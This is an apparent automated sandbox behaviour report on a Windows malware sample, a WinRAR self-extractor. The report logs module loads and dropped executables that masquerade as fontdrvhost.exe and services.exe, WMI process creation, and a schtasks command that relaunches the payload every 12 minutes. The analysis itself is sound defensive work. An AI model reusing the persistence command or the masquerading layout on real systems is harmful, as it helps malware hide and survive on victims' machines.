                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: version.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: sspicli.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mscoree.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: version.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: uxtheme.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: windows.storage.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wldp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: profapi.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptsp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rsaenh.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptbase.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: sspicli.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mscoree.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: version.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: uxtheme.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: windows.storage.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wldp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: profapi.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptsp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rsaenh.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: cryptbase.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: sspicli.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ktmw32.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rasapi32.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rasman.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rtutils.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mswsock.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: winhttp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: iphlpapi.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dnsapi.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: winnsi.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: rasadhlp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: wbemcomn.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: winmm.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: winmmbase.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mmdevapi.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: devobj.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ksuser.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: avrt.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: audioses.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: powrprof.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: umpdc.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: msacm32.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: midimap.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dwrite.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: edputil.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: windowscodecs.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ntmarta.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: dpapi.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: secur32.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: schannel.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: mskeyprotect.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ntasn1.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ncrypt.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: ncryptsslp.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: msasn1.dll
                                    Source: C:\Drivers\fontdrvhost.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: apphelp.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: version.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: wldp.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: profapi.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: C:\Drivers\fontdrvhost.exeDirectory created: C:\Program Files\Internet Explorer\SIGNUP\services.exeJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeDirectory created: C:\Program Files\Internet Explorer\SIGNUP\c5b4cb5e9653ccJump to behavior
                                    Source: YGk3y6Tdix.exeStatic file information: File size 2312934 > 1048576
                                    Source: YGk3y6Tdix.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: YGk3y6Tdix.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: YGk3y6Tdix.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: YGk3y6Tdix.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: YGk3y6Tdix.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: YGk3y6Tdix.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: YGk3y6Tdix.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: YGk3y6Tdix.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: YGk3y6Tdix.exe
                                    Source: YGk3y6Tdix.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: YGk3y6Tdix.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: YGk3y6Tdix.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: YGk3y6Tdix.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: YGk3y6Tdix.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeFile created: C:\Drivers\__tmp_rar_sfx_access_check_5317375Jump to behavior
                                    Source: YGk3y6Tdix.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FBF640 push ecx; ret 0_2_00FBF653
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FBEB78 push eax; ret 0_2_00FBEB96
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 4_2_00007FFD9B883850 push BEFFFFFEh; retf 4_2_00007FFD9B883855
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 4_2_00007FFD9B882773 pushad ; ret 4_2_00007FFD9B882778
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 4_2_00007FFD9B8853D4 push cs; ret 4_2_00007FFD9B8853D9
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 4_2_00007FFD9B885996 pushad ; ret 4_2_00007FFD9B88599B
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 4_2_00007FFD9BC70301 push cs; iretd 4_2_00007FFD9BC7033A
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 4_2_00007FFD9BC702D4 push cs; iretd 4_2_00007FFD9BC7033A
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 4_2_00007FFD9BC701C4 push es; iretd 4_2_00007FFD9BC70242
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 23_2_00007FFD9B8932D6 push cs; iretd 23_2_00007FFD9B8932D7
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 23_2_00007FFD9B8B4827 push E9FFFFFFh; retf 23_2_00007FFD9B8B482C
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 23_2_00007FFD9B8B7525 push ebx; iretd 23_2_00007FFD9B8B756A
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 23_2_00007FFD9B883850 push BEFFFFFEh; retf 23_2_00007FFD9B883855
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 23_2_00007FFD9B882773 pushad ; ret 23_2_00007FFD9B882778
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 23_2_00007FFD9B8853D4 push cs; ret 23_2_00007FFD9B8853D9
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 23_2_00007FFD9B885996 pushad ; ret 23_2_00007FFD9B88599B
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 24_2_00007FFD9B8B3850 push BEFFFFFEh; retf 24_2_00007FFD9B8B3855
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 24_2_00007FFD9B8B2773 pushad ; ret 24_2_00007FFD9B8B2778
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 24_2_00007FFD9B8B53D4 push cs; ret 24_2_00007FFD9B8B53D9
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 24_2_00007FFD9B8B5996 pushad ; ret 24_2_00007FFD9B8B599B
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 25_2_00007FFD9B8C4827 push E9FFFFFFh; retf 25_2_00007FFD9B8C482C
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 25_2_00007FFD9B8C74D5 push ebx; iretd 25_2_00007FFD9B8C756A
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 25_2_00007FFD9B8A32D6 push cs; iretd 25_2_00007FFD9B8A32D7
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 25_2_00007FFD9B893850 push BEFFFFFEh; retf 25_2_00007FFD9B893855
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 25_2_00007FFD9B892773 pushad ; ret 25_2_00007FFD9B892778
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 25_2_00007FFD9B8953D4 push cs; ret 25_2_00007FFD9B8953D9
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 25_2_00007FFD9B895996 pushad ; ret 25_2_00007FFD9B89599B
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 26_2_00007FFD9B8A3850 push BEFFFFFEh; retf 26_2_00007FFD9B8A3855
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 26_2_00007FFD9B8A2773 pushad ; ret 26_2_00007FFD9B8A2778
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 26_2_00007FFD9B8A53D4 push cs; ret 26_2_00007FFD9B8A53D9
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 26_2_00007FFD9B8A5996 pushad ; ret 26_2_00007FFD9B8A599B
                                    Source: fontdrvhost.exe.0.drStatic PE information: section name: .text entropy: 7.56520810942533
                                    Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe.4.drStatic PE information: section name: .text entropy: 7.56520810942533
                                    Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe0.4.drStatic PE information: section name: .text entropy: 7.56520810942533
                                    Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe1.4.drStatic PE information: section name: .text entropy: 7.56520810942533
                                    Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe2.4.drStatic PE information: section name: .text entropy: 7.56520810942533
                                    Source: services.exe.4.drStatic PE information: section name: .text entropy: 7.56520810942533

                                    Persistence and Installation Behavior

                                    barindex
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Program Files\Internet Explorer\SIGNUP\services.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile written: C:\Program Files\Internet Explorer\SIGNUP\services.exeJump to behavior
                                    Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\sRuyTvnC.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\LRGWtOLy.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\Default\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\BimGJlFQ.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\MihenAyR.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\tWFZTedC.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\jqKBOCJa.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\RKjvWuQm.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\bsCLGWVU.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\aFStzZSn.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\knlJjCXV.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Program Files\Internet Explorer\SIGNUP\services.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\CANODYsk.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeFile created: C:\Drivers\fontdrvhost.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\szTqaJAi.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\iIcaGucE.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\jWKBqQkB.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\knlJjCXV.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\aFStzZSn.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\jqKBOCJa.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\MihenAyR.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\CANODYsk.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\tWFZTedC.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\sRuyTvnC.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\iIcaGucE.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\LRGWtOLy.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\BimGJlFQ.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\szTqaJAi.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\jWKBqQkB.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\bsCLGWVU.logJump to dropped file
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\RKjvWuQm.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Source: C:\Drivers\fontdrvhost.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /f
                                    Source: C:\Drivers\fontdrvhost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                                    Source: C:\Drivers\fontdrvhost.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
